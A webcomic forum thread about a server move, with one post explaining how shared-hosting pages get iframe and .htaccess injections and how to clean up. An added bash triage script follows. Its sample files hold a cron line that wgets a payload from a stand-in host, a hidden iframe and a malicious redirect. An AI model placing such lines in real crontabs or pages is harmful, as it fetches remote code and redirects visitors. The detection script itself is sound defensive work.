Change Your Bookmarks
Edit: Alright, we're finally back on the home domain, now located on the private server.
I hope everything is working. There may be some problems I have to work out yet.
- The Inkwell Coyote
- Posts: 9458
- Joined: Wed Aug 09, 2006 9:28 pm
Re: Change Your Bookmarks
Will the forums be getting moved as well, or do you plan to just update the link on the main page?
Re: Change Your Bookmarks
Once the domain is transferred, I may have to play a little musical chairs to keep the forums up. I'll try to transfer the forums to the domain once it's settled so there isn't as much down-time.
Re: Change Your Bookmarks
Good luck man, and I'll be sure to fix my bookmarks ASAP. (Don't let that stop you though.)
Re: Change Your Bookmarks
The redirecting after using the old URL isn't working anymore, so it's time for a change of bookmarks.
[under construction]
Re: Change Your Bookmarks
Yeh I had to change my bookmark cause I procrastinated too much
- Grand Templar
- Posts: 1142
- Joined: Sat Dec 20, 2008 2:36 pm
- Location: Lost in the Internet....
Re: Change Your Bookmarks
Well, as soon as 2kinds.com switches to the private server we won't have to worry about virus problems as much, and the website should run faster. Good luck with the move and all, Tom. Maybe after the move is over you'll have more time to work on the book.
Re: Change Your Bookmarks
I hope this helps keep Tom focused on new comics rather than server related troubleshooting.
We've seen these same types of "attacks" from time to time and they always seem to use one of a handful of ways to modify the pages with the iframes or inject malicious .htaccess content. I will list the most common below, but there may be others.
1) dl() with mod_php
The PHP dl() function (http://php.net/manual/en/function.dl.php) allows PHP to load extensions such as Ioncube or Zend dynamically where needed instead of simply installing them globally where they will be loaded on mod_php startup. The code is designed to unload the extension after the process is complete, but certain versions of PHP had bugs which allowed malicious attackers to load the extension in a way where it would modify the processed PHP content of all accounts on a server with an iframe at random times. This is one of the rare occasions where it is a global bug rather than strictly a user level bug where only a single account is affected.
This was solved by disabling the dl() function, switching to phpsuexec (PHP as a CGI), or by using modules such as suhosin from http://www.hardened-php.net/.
This attack is rare because it relies on access to the server, vulnerable PHP/Apache versions, and slow administrator response.
2) Virus with FTP password.
The most common method we've seen used in cases like this is a virus simply infecting a workstation with access to the passwords, logging into cPanel/FTP/Webdav using passwords stored on the machine, and uploading modified pages. These viruses are more advanced than one would think and their authors try to take advantage of every method of infection possible.
I always suggest a scan with at least two different antivirus engines (free examples at http://www.avast.com/, http://pack.google.com/ and http://housecall.trendmicro.com/) and several malware scanners (Spy-bot from http://www.safer-networking.org/en/home/index.html, Ad-aware from http://download.cnet.com/Ad-Aware-Anniv ... 45910.html, or Malwarebytes from http://download.cnet.com/Malwarebytes-A ... 04572.html). The Google Pack from http://pack.google.com/ also offers Spyware Doctor Starter Edition, which offers another scanner to use.
These measures might seem excessive, but we've seen client sites hacked repeatedly after changing passwords to 30+ characters on BSD-based servers knowing the servers were 100% secure. After scanning with multiple tools the infection was finally found and removed from the client's workstation. The hacking stopped after that. :)
3) Vulnerabilities in installed software.
There are sometimes problems with the software installed onto a website which allows code injection into writable documents such as index pages.
This is easily prevented by keeping software such as phpBB up to date and checking for vulnerabilities in custom software on the site that may allow such injections. mod_security can help find and block these types of vulnerabilities.
--
Cleaning up after this type of hack can be bothersome. The easiest way is to upload a completely new backup of all site content before the hack took place. If that is not an option then scan the website contents with ClamAV (it detects a wide variety of different types of malware), run a grep for iframes and javascript to manually check for any additional nastiness, check .htaccess files for any injected content (this is more common than you think), and check crons for any injections that may allow for reinjection.
Note: It isn't common for the server itself to be rooted (hacked) when this occurs. This is most commonly an account level/user level problem rather than a global security breach on the entire server.
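Added example, not part of the post above: a small shell triage script for the manual cleanup checks it lists (grep for iframes, injected .htaccess content, cron entries). The regexes, function names, sample files and the injected.example host are constructed assumptions for illustration; ClamAV scanning is left out.

```bash
#!/bin/sh
# Added example: triage a web root for the injection types named in the post.
# The regexes are illustrative heuristics (assumptions), not full signatures;
# a hit means "look at this by hand", e.g. a canonical-host redirect is benign.

# Files containing a 0/1-pixel or CSS-hidden iframe.
scan_iframes() {
  find "$1" -type f \( -name '*.php' -o -name '*.htm*' -o -name '*.js' \) \
    -exec grep -liE '<iframe[^>]*((width|height)="?[01](px)?[" />]|display: *none|visibility: *hidden)' {} + | sort
}

# .htaccess lines that prepend PHP code or send visitors to an absolute URL.
scan_htaccess() {
  find "$1" -type f -name '.htaccess' \
    -exec grep -HnEi 'auto_(prepend|append)_file|^[[:space:]]*(RewriteRule|Redirect|ErrorDocument)[[:space:]].*https?://' {} + | sort
}

# Non-comment crontab lines (file saved with `crontab -l > file`) that
# download or decode something.
scan_cron() {
  grep -nEi '^[^#]*(wget|curl|fetch|base64|eval)' "$1" || true
}

# Constructed sample tree so the script runs offline; all contents are made up.
make_sample() {
  local d; d=$(mktemp -d)
  mkdir -p "$d/forum"
  printf '<html><body>comic</body></html>\n' > "$d/clean.html"
  printf '<iframe src="video.html" width="560" height="315"></iframe>\n' > "$d/embed.html"
  printf '<?php echo "hi"; ?>\n<iframe src="http://injected.example/" width="1" height="1" style="visibility:hidden"></iframe>\n' > "$d/index.php"
  printf 'RewriteEngine On\nRewriteCond %%{HTTP_REFERER} google [NC]\nRewriteRule .* http://injected.example/ [R,L]\n' > "$d/forum/.htaccess"
  printf '# nightly backup\n0 3 * * * /home/user/backup.sh\n*/10 * * * * wget -q http://injected.example/payload -O /tmp/.p\n' > "$d/crontab.txt"
  echo "$d"
}

# Usage: triage.sh WEBROOT [CRONTAB_DUMP]; with no arguments it scans the sample.
root=${1:-$(make_sample)}; cron=${2:-$root/crontab.txt}
echo "== hidden iframes"; scan_iframes "$root"
echo "== .htaccess";      scan_htaccess "$root"
if [ -f "$cron" ]; then echo "== cron"; scan_cron "$cron"; fi
[ -n "${1:-}" ] || rm -rf "$root"   # only the sample tree is removed
```

The ordinary 560x315 embed in the sample is not reported, which is the point of matching on size and visibility rather than on every iframe.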
Re: Change Your Bookmarks
So, private server now, hu? Nice
...God, so many problems. Kudos to Tom for handling 'em all.
Interesting...LinKinds up there has no posts...right next to his post. another case of the lost posts it seems
- The Inkwell Coyote
- Posts: 9458
- Joined: Wed Aug 09, 2006 9:28 pm
Re: Change Your Bookmarks
Looks like the server swap is finished, or at least a part of it is finished! Nice and fast, the way I like it. Thanks Tom!
Re: Change Your Bookmarks
...aaaaaand there we go again!
thanks, tom! it went smoother and quicker than i had presumed.
Re: Change Your Bookmarks
I wouldn't be so sure that it is fully switched over yet.
It looks like the 2kinds.com domain has been switched over to a dedicated solution (bare metal or virtualized) at 1and1, but it doesn't look like the website is fully running on the new server yet.
http://whois.domaintools.com/2kinds.com vs. http://whois.domaintools.com/twokindscomic.com
I tried to visit the site once when twokindscomic.com was redirected to 2kinds.com on the new server, but it was so slow that it was virtually unusable. It looks like the new server isn't optimized to handle all the traffic the website gets or doesn't have enough resources to handle it.
- Raphael
- Templar Inner Circle
- Posts: 4811
- Joined: Wed Apr 23, 2008 11:41 pm
- Location: behind you, with a blade at your throat
Re: Change Your Bookmarks
Could Tom or one of the mods check the forum coding or something for bugs? Extorio's virus protection system seems to be blocking him from entering the forum.
- Chi-Yu
- New Citizen
- Posts: 43
- Joined: Fri Mar 13, 2009 7:35 pm
- Location: Germany
- Fav. Twokinds Character: Natani
Re: Change Your Bookmarks
"Dlemon: Well as soon as 2kinds.com switches to the private server [...] the website should run faster."
Something makes me think that something went wrong.